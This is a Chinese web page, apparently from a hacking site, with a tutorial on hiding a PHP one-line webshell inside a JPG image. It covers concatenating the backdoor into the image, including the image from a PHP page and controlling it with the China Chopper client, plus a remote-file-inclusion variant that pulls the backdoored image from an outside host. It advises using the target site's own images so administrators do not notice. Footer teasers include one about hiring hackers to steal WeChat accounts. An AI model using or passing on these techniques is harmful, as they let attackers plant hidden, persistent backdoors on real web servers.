我们平时藏匿图片后门是什么流程呢?我们来看一下
1、建立一个eval.php文件,上面加入我们的后门:
1 | <?phpassert($_POST[feiji]);?> |
2、找一张图片1.jpg,更好是从目标网站上下载下来的图片。
3、合并图片和php后门:
1 | Copy/bC:\xampp\htdocs\images\1.jpg+C:\xampp\htdocs\images\eval.phpC:\xampp\htdocs\images\2.jpg |
4、在任何一个php文件中包含这个2.jpg的图片后门,这里以images.php为例,写入以下的代码:
1 | <?phpinclude(‘2.jpg’);?> |
5、上传2.jpg和images.php,在菜刀里添加一句话后门:http://127.0.0.1/images/images.php,密码为feiji。
访问图片正常:
访问images.php页面出现乱码,但是后门已经正常运行:
但是一句话在菜刀里是可以解析成功的:
注:省去第3步也是可以的,只不过直接访问图片会乱码,会让管理员起疑心。
1、其实就是远程文件包含,也不只是针对图片,要求你有高权限,能够操纵Apache和修改php.ini文件:
修改ini的配置选项allow_url_fopen和allow_url_include为ON。
2、创建任何一个php文件中,以images.php为例,写入以下的代码:
1 | <?php$filename=$_GET['feiji'];include($filename);?> |
3、刚才做的图片后门jpg可以放在别的网站(http://www.xxxx.com)上,在菜刀里添加一句话后门:
http://127.0.0.1/images/images.php?feiji=https://www.hack56.com/images/ohtg1ki141p.jpg密码为feiji
注:这样做的优点是可以随时变换各种后门,缺点是很难获取到高权限。
每日好文 哪儿能寻找网络黑客帮忙盗号(请网络黑客盗微信号需要多少钱) 概率不大,手机微信技术性精英团队也不是素食的。 如何防止网络黑客盗取本人用户信息,确保资金安全 能够被劫持短信验证码窃取小型...
新华社莫斯科11月26日电(记者李奥)俄罗斯国防部26日说,俄军当天再次成功试射“锆石”高超音速巡航导弹。 据俄国防部当天发布的消息,俄海军22350型护卫舰首舰“戈尔什科夫海军元帅”号当天...
现在基本上玩手机的小伙伴都有自己的微信,我们可以通过微信发朋友圈,谈生意,聊天等等,有时候我们可能不小心把聊天记录给弄没了,而且是比较重要的聊天记录,聊天记录的话也不好意思问朋友要,今天小编就教大家怎...
汪正扬现阶段就读清华附设实验中学。2014年十二岁时由于报名参加中国网络安全交流会,使他全国闻名。现阶段,他是中国年纪最少的网络黑客。汪正扬8岁时,忽然痴迷敲代码。当他父母发觉汪正扬对电脑上痴迷后,他...
12月30日更新全集下载: magnet:?xt=urn:btih:d89eb0549a94184f761e73a59bc30877f13254ac 舌尖上的中国第一部导演陈晓卿,解说李立宏...
视频一出褒贬不一,可能怕造成舆论导向吧。媒体的力量实在太大了。视频柴静雾霾调查苍穹之下同呼吸共命运104分55秒看完你就知道雾霾是什么,对人。 我有,可以私信我。也可以到柴静吧找找“下载”相关贴 私信...